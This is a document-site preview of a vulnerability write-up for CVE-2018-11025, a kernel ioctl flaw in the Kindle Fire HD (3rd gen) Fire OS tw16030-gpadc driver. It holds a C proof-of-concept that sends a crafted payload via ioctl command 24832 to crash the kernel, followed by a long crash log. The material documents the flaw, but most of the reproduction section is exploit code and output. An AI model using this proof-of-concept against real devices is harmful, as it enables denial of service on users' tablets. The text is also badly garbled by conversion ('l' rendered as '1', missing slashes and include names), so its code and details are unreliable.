收藏
下载资源 加入VIP,免费下载

(CVE-2018-11025)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx

上传人:lao****ou 文档编号:794834 上传时间:2024-05-25 格式:DOCX 页数:8 大小:51.15KB
下载 相关 举报
(CVE-2018-11025)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx_第1页
第1页 / 共8页
(CVE-2018-11025)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx_第2页
第2页 / 共8页
(CVE-2018-11025)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx_第3页
第3页 / 共8页
(CVE-2018-11025)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx_第4页
第4页 / 共8页
(CVE-2018-11025)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx_第5页
第5页 / 共8页
亲,该文档总共8页,到这儿已超出免费预览范围,如果喜欢就下载吧!
资源描述

《(CVE-2018-11025)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx》由会员分享,可在线阅读,更多相关《(CVE-2018-11025)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx(8页珍藏版)》请在第一文库网上搜索。

1、(CVE-2018-11025)AmazonKind1eFireHD(3rd)FireOSkerne1组件安全漏洞一、漏洞简介AmazonKind1eFireHD(3rd)FireOS4.5.5.3内核组件中的内核模块omapdriversmfdtw16030-gpadc.c允许攻击者通过设备/dev/tw16030上的ioct1的参数注入特制的参数-gpadc命令24832并导致内核崩溃。要探索此漏洞,必须打开设备文件devtw16030-gpadc,并使用命令24832和精心设计的有效负载作为第三个参数在此设备文件上调用ioct1系统调用。二、漏洞影响FireOS4.5.5.3三、复现过程

2、poc/* ThisispocofKind1eFireHD3rd* Abugintheioct1interfaceofdevicefi1edevtw16030-gpadccauses* thesystemcrashviaIOCT124832.* ThisPocshou1drunwithpermissiontodoioct1ondevtw16030-gpadc.*/#inc1ude#inc1ude#inc1udeinc1udeconststaticchar*driver=devtw16030-gpadc;staticcommand=24832;structtw16030_gpadc_user_p

3、armsintchanne1;intstatus;unsignedshortresu1t;;intmain(intargc,char*argvjchar*env)structtw16030_gpadc_user_parmspay1oad;pay1oad.channe1=0x9b2a9212;pay1oad.status=0x0;pay1oad.resu1t=0x0;intfd=0;fd=OPen(driver,O_RDWR);if(fd/data/IOCaItmp1og);return-1;printf(Tryioct1devicefi1e%s,withcommand0%andpay1oadN

4、U11njdriver,command);printf(Systemwi11crashandreboot.n);if(ioct1(fdjcommand,&pay1oad)data1oca1tmp1og);return-1;c1ose(fd);return0;崩溃日志18460.321624Unab1etohand1ekerne1pagingrequestatvirtua1address4b3f25fc18460.330139pgd=ca21000018460.3332514b3f25fc*pgd=0000000018460.337768Interna1error:Oops:5#1PREEMPT

5、SMPARM18460.343810Modu1es1inkedin:omap1fb(0)pvrsrvkm(O)pvr_1ogger(0)18460.351440CPU:0Tainted:GO(3.4.83-gd2afc0bae69#D18460.358825PCisattw16030_gpadc_ioct1+0x160/0x18018460.3643791Risattw16030_gpadc_conversion+0x5c/0x48418460.370452pc:yIr:psr:6003001318460.370452sp:de94dd90ip:00000000fp:de94df0418460

6、.383422r10:00000000r9:dcccf608r8:bea875ec18460.389282ecr7:de94c000r6:00000000r5:00006100r4:bea87518460.39669701r3:fffffeb4r2:4b3f2730r1:de94dee8r0:00000018460.404113mentuserF1ags:ZCvIRQsonFIQsonModeSVC_32ISAARMSeg18460.41204818460.418609Contro1:10c5387dTab1e:8a21004aDAC:0000001518460.418609PC:0c031b

7、000:18460.423583b000e24b101ce30f3eb4e34f3fffe0822082e0812102e51220e4e18120b3e597300818460.434234b020e294200c30d2200333a03000e35300000a000006e3e0000ce24bd01ce89da8f018460.444885b040e24b0e17e17e3a0200cebfced7fe3a0100cebfcf5c4eafffff8e1a00004e24b118460.455444b060e3500000eb4e34f3fffe08121020afffff3eafff

8、ff1e51b2170e24b101ce30f318460.465972b080e512213416ceaffffdfc0acabbce18120b3eaffffe303e0303c150b016c050b318460.476623b0a0e1a0c00d0ec03e00012e89da800e92dd800e24cb004e59030e0e35300001590018460.487182b0c0e1a0c00d00de92dd800e24cb004e92dd800e24cb004e59000fe89da800e1ac18460.497863b0e0e5d020e900de92dd800e24

9、cb0045d030e8e1820003e2000003e89da800e1ac18460.50854418460.5085441R:0c031a8d0:18460.513519a8d0e89da87800a03a00000e89da878e1a00004ebffff20e2000003e350000213e0018460.524078a8fC09ba0c00000a000114e59f5454e1a0c00de92ddff0e24cb004e24dd014e250918460.534759a910e595008c0b6e35100019a00000ae35000000a00010be2800

10、004eb0e1ffe1d9118460.545318a930e595308c08ce28a0004eb0e1f69e3e06015e59f142ce5930000ebff4e6be595a18460.555999a950e1a00006193e5933038e3530000e24bd028e89daff0e595a08c3a03f52e023a18460.566680a97013e0600f010e08c70081a0000253e59a32c4e0818101e595c088e313018460.577331a990e35100000b6e35400000a0000bc0a0000c4e1

11、d930b8e35300010a0000d7e1d9418460.587890a9be3a0000e0010a0000d1e1d920b6e3a01002e3a02090e5956088ebfff8bce354018460.59857118460.598571SP:0de94dd10:18460.603546dd100000000008060030013ffffffff0000000dde94dda010624dd3de94dd4cc031b18460.614196dd30de94dd7c37000000001de94dee8bea875ecde94df04de94dd48C06a5318C0

12、00818460.624877dd504b3f2730000bea875ecdcccf608fffffeb4bea875ec0000610000000000de94c18460.635528dd700000000008060030013ffffffffde94df0400000000de94dd90C031a950c031b18460.646087dd90de94ddac8fc00000000000000009b2a92120000000000000000000400000001f18460.656738ddb0C00795a02bcde94de0cde94ddd800000001de94dd

13、d4de94ddc8C00795b4C007918460.667419ddd0C0070df88f46000001300000001C00795acde94c0000000000100000004dd32f18460.678100ddf00000000100000004dd32f8000000000000000000de94de10C00723a0C06a481818460.68862918460.688659FP:0xde94de84:18460.693725de84de94de90ed4de94dea8c00723aC0207454C00bd9200000001c26fda80de94d18460.704284dea4000fffff000de94df140000000000000000ffffffff00000002000000010000018460.714935dec4000000019fc0000000000000000dcccf608cfa9bf00de94defcde94dee0C020818460.725616dee400000000f74de94df08C013604400000000d683fb4000000004d683

展开阅读全文
相关资源
猜你喜欢
相关搜索

当前位置:首页 > 应用文档 > 工作总结

copyright@ 2008-2022 001doc.com网站版权所有   

经营许可证编号:宁ICP备2022001085号

本站为文档C2C交易模式,即用户上传的文档直接被用户下载,本站只是中间服务平台,本站所有文档下载所得的收益归上传人(含作者)所有,必要时第一文库网拥有上传用户文档的转载和下载权。第一文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对上载内容本身不做任何修改或编辑。若文档所含内容侵犯了您的版权或隐私,请立即通知第一文库网,我们立即给予删除!



客服